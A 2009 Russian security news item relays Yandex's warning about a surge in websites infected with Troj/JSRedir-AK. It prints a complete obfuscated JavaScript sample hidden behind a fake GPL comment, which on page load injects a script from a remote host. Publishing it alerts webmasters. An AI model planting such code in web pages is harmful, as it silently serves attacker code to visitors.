Газета InfoSecurity

Последний номер

Архив номеров

На главную 

   
Число
подписчиков


 Рассылка 'Информационная Безопасность: Проблемы, Методы, Решения'
 Сетевая газета InfoSecurity.ru 28 декабря 2009 г. 

Яндекс сообщает о росте количества сайтов, зараженных новым вирусом

  Специалисты компании Яндекс сообщают о резком росте числа сайтов, зараженных новым вирусом. Вредоносный код добавляется в файлы *.js на заражаемом сайте или просто в конец страницы. Злоумышленники пытаются замаскировать вредоносный код от веб-мастера при помощи использования комментария /*GNU GPL*/. Этот тип заражения сайтов классифицирован нашим антивирусным партнером компанией Sophos как Troj/JSRedir-AK.

  Вредоносный код выглядит, например, так:

/*GNU GPL*/ try{window.onload = function(){var F1s4h5mjnzo = document.createElement('s(c&@^)r&^#i)(@p^&t^))'.replace(/#|@|&|\^|\!|\)|\(|\$/ig, ''));F1s4h5mjnzo.setAttribute('type', 'text/javascript');F1s4h5mjnzo.setAttribute('src', 'h@$!t#!!t!)$&p#:#&/@@/))#f(o(r&!$b!&e##^s!-$^!c#$&o&m).^(#m@@y#b@e@#s&&t@!y^)!#o(u((($x$!i#(.@&)@c&n@^@.(#^&s(#@i)(@@t^e(#&m&e^#$t!@e$^#r$-#c@&#o#^m^^(.@x!x^)x!x!@@x))!x(x$$@x$&x!))#l(@@x$.)&$r@($^u)!@):@^$&)8@)@0&8#$0)&/&c!l$a(&&r$i@&@n!$^.()(c(##o^#(m&$$)$/@#^c!(l)#!a)!(r$i&$)n(().$$c&^##@o(!&^m^^/^d@#@e$(@!^v#@i))&^)a(#!n)!t)@)a$r!t$(.($&c!^&o!#m)&@&/))(g)&^o^@)o)(#g&(#^l()!e!^!.)&@c)&&!o)()$!m@^/!!e@!x(@&a&@@m&i$n^@e&#(^&r)^.(c&(&o^&m(/#@)'.replace(/#|\!|\(|\$|&|\)|\^|@/ig, ''));F1s4h5mjnzo.setAttribute('defer', 'defer');F1s4h5mjnzo.setAttribute('id', 'J#(i)^#v$@@o(^@8(x!&w(^&r!&#^a$$^@e^3(^@$z#)i!)s#&#'.replace(/\(|@|\^|&|\)|\$|\!|#/ig, ''));document.body.appendChild(F1s4h5mjnzo);}} catch(e) {}

  На текущий момент Яндексу известно примерно о более 3 тысячах сайтов, зараженных вирусом типа Troj/JSRedir-AK.

Источник: webmaster.ya.ru  


      Рейтинг@Mail.ru       Rambler's Top100 Rambler's Top100